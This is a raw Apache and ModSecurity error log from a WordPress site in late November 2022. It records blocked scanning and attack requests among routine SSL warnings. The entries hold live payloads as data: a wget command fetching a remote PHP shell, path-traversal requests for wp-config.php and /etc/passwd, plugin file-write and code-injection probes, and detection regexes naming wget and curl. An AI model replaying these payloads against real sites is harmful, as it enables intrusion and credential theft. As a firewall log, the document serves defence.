"/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y3qPE7VeI6MCkRxQb2yjbgAAABI"], referer: https://www.google.com [Sun Nov 20 22:17:09.090688 2022] [ssl:warn] [pid 24845:tid 140285382915968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:13.970818 2022] [ssl:warn] [pid 31381:tid 140304018892672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:14.112668 2022] [ssl:warn] [pid 31382:tid 140304018892672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:14.787073 2022] [ssl:warn] [pid 31382:tid 140304018892672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:20.696933 2022] [ssl:warn] [pid 31382:tid 140304018892672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:24.538641 2022] [ssl:warn] [pid 31928:tid 139665159968640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 03:36:24.653202 2022] [ssl:warn] [pid 31929:tid 139665159968640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 21 16:56:41.150708 2022] [:error] [pid 32171:tid 139664862201600] [client 3.69.53.252:55038] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y3v0GdxFhnoRVConlDNdcQAAAMU"] [Mon Nov 21 16:57:30.371226 2022] [:error] [pid 32171:tid 139664878987008] [client 3.69.53.252:55242] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y3v0StxFhnoRVConlDNdpAAAAMM"] [Mon Nov 21 23:47:35.839918 2022] [:error] [pid 32171:tid 139664786667264] [client 3.69.53.252:54452] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y3xUZ9xFhnoRVConlDOO1AAAAM4"] [Mon Nov 21 23:48:20.500615 2022] [:error] [pid 32171:tid 139664727918336] [client 3.69.53.252:54644] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y3xUlNxFhnoRVConlDOPBAAAANU"] [Tue Nov 22 01:07:01.150826 2022] [:error] [pid 31946:tid 139664837023488] [client 5.188.62.76:40298] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y3xnBRZMzadHhmn14AqjfQAAAAg"] [Tue Nov 22 03:41:19.405629 2022] [ssl:warn] [pid 17700:tid 140442615187328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 03:41:19.568769 2022] [ssl:warn] [pid 17701:tid 140442615187328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 03:41:20.056274 2022] [ssl:warn] [pid 17701:tid 140442615187328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 03:41:21.630232 2022] [ssl:warn] [pid 17701:tid 140442615187328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 03:41:25.312787 2022] [ssl:warn] [pid 18151:tid 140679559620480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 03:41:25.428961 2022] [ssl:warn] [pid 18152:tid 140679559620480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 22 05:14:55.962026 2022] [:error] [pid 18630:tid 140679263004416] [client 3.69.53.252:36672] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y3yhH8F5B40qLHvEP55BUwAAAMU"] [Tue Nov 22 05:15:41.168027 2022] [:error] [pid 18171:tid 140679128721152] [client 3.69.53.252:36828] [client 3.69.53.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y3yhTZnJxkaDOCrwmWbSogAAAJU"] [Wed Nov 23 03:32:22.865058 2022] [ssl:warn] [pid 13646:tid 139875436447616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 23 03:32:23.005805 2022] [ssl:warn] [pid 13648:tid 139875436447616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 23 03:32:23.380127 2022] [ssl:warn] [pid 13648:tid 139875436447616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 23 03:32:24.939606 2022] [ssl:warn] [pid 13648:tid 139875436447616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 23 03:32:27.163837 2022] [ssl:warn] [pid 14064:tid 140320433059712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 23 03:32:27.288458 2022] [ssl:warn] [pid 14065:tid 140320433059712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/11/23 11:28:48 [error] 14045#14045: *347698 access forbidden by rule, client: 3.124.185.97, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Nov 23 11:39:52.026443 2022] [:error] [pid 14719:tid 140320113149696] [client 161.97.73.248:38656] [client 161.97.73.248] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y35M2Jpyrv4DLdYWancRNgAAAMg"] [Thu Nov 24 03:26:31.969995 2022] [ssl:warn] [pid 13671:tid 140354606278528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 03:26:32.135472 2022] [ssl:warn] [pid 13672:tid 140354606278528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 03:26:32.419166 2022] [ssl:warn] [pid 13672:tid 140354606278528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 03:26:34.139663 2022] [ssl:warn] [pid 13672:tid 140354606278528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 03:26:36.366219 2022] [ssl:warn] [pid 14089:tid 140470493747072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 03:26:36.493580 2022] [ssl:warn] [pid 14090:tid 140470493747072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 24 10:35:14.539111 2022] [ssl:warn] [pid 14090:tid 140470493747072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 02:10:18.443161 2022] [autoindex:error] [pid 4085:tid 140470304732928] [client 43.130.72.43:56100] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 25 03:24:30.338111 2022] [ssl:warn] [pid 9196:tid 140533675992960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 03:24:30.518223 2022] [ssl:warn] [pid 9197:tid 140533675992960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 03:24:30.853082 2022] [ssl:warn] [pid 9197:tid 140533675992960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 03:24:32.661899 2022] [ssl:warn] [pid 9197:tid 140533675992960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 03:24:34.939061 2022] [ssl:warn] [pid 9615:tid 139927544612736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 03:24:35.054338 2022] [ssl:warn] [pid 9616:tid 139927544612736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 25 13:37:07.008222 2022] [autoindex:error] [pid 10270:tid 139927157147392] [client 43.130.99.186:39540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 25 18:21:40.242659 2022] [:error] [pid 9634:tid 139927274645248] [client 65.109.138.122:46242] [client 65.109.138.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y4FOBIiOYCQWeGfxv5hwcQAAAEI"], referer: www.google.com [Fri Nov 25 18:21:41.571384 2022] [:error] [pid 9634:tid 139927140361984] [client 65.109.138.122:46244] [client 65.109.138.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y4FOBYiOYCQWeGfxv5hwcgAAAFI"], referer: www.google.com [Sat Nov 26 03:26:20.912121 2022] [ssl:warn] [pid 25663:tid 140712401799040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 03:26:21.053894 2022] [ssl:warn] [pid 25664:tid 140712401799040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 03:26:21.455020 2022] [ssl:warn] [pid 25664:tid 140712401799040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 03:26:22.887094 2022] [ssl:warn] [pid 25664:tid 140712401799040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 03:26:25.147130 2022] [ssl:warn] [pid 26082:tid 140077084968832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 03:26:25.294520 2022] [ssl:warn] [pid 26083:tid 140077084968832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 26 16:50:25.794394 2022] [autoindex:error] [pid 26729:tid 140076692481792] [client 20.198.221.121:52894] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Nov 27 03:13:27.298360 2022] [ssl:warn] [pid 4859:tid 139971256010624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:13:27.445502 2022] [ssl:warn] [pid 4860:tid 139971256010624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:13:27.821356 2022] [ssl:warn] [pid 4860:tid 139971256010624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:13:29.633942 2022] [ssl:warn] [pid 4860:tid 139971256010624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:13:31.931454 2022] [ssl:warn] [pid 5279:tid 140307833608064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:13:32.056259 2022] [ssl:warn] [pid 5280:tid 140307833608064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 27 03:19:53.838470 2022] [:error] [pid 5298:tid 140307513468672] [client 185.148.47.73:39348] [client 185.148.47.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y4MdqcabCp2lx5eWrdKMqwAAAEg"] [Sun Nov 27 04:59:26.329128 2022] [autoindex:error] [pid 5751:tid 140307602630400] [client 20.100.175.160:42180] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun Nov 27 23:56:44.739877 2022] [:error] [pid 5751:tid 140307488290560] [client 142.93.7.139:54956] [client 142.93.7.139] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/diarise/download.php?calendar=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "Y4Q_jOhh8KgJyUBDdmDWeQAAAMs"] [Mon Nov 28 03:41:26.960482 2022] [ssl:warn] [pid 1596:tid 140001225303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 03:41:27.089016 2022] [ssl:warn] [pid 1597:tid 140001225303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 03:41:27.467896 2022] [ssl:warn] [pid 1597:tid 140001225303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 03:41:28.806149 2022] [ssl:warn] [pid 1597:tid 140001225303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 03:41:31.136886 2022] [ssl:warn] [pid 2032:tid 140262024337280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 03:41:31.257080 2022] [ssl:warn] [pid 2033:tid 140262024337280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 28 09:51:32.685557 2022] [:error] [pid 2608:tid 140261843715840] [client 62.210.215.74:45876] [client 62.210.215.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y4TK9B0MV5asJRCMo2lhmQAAAMA"] [Mon Nov 28 10:00:48.088202 2022] [:error] [pid 2608:tid 140261694867200] [client 217.160.100.115:46210] [client 217.160.100.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y4TNIB0MV5asJRCMo2lhwgAAAMk"], referer: www.google.com [Tue Nov 29 03:20:28.947853 2022] [ssl:warn] [pid 8593:tid 140575079298944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:20:29.104051 2022] [ssl:warn] [pid 8594:tid 140575079298944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:20:29.479692 2022] [ssl:warn] [pid 8594:tid 140575079298944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:20:31.168924 2022] [ssl:warn] [pid 8594:tid 140575079298944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:20:33.458922 2022] [ssl:warn] [pid 9011:tid 140533580658560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:20:33.583899 2022] [ssl:warn] [pid 9012:tid 140533580658560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 29 03:48:34.482824 2022] [:error] [pid 9673:tid 140533234116352] [client 41.216.188.92:57946] [client 41.216.188.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Y4XHYskhlIWLR0-EtapgggAAAMs"], referer: www.google.com [Tue Nov 29 04:02:56.016798 2022] [:error] [pid 9032:tid 